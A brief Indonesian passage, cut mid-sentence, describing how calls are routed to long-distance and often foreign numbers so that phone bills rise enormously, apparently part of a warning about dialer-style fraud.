nomor jarak jauh, seringkali nomor luar negeri. Akibatnya, tagihan telepon menjadi melonjak
tak terkira.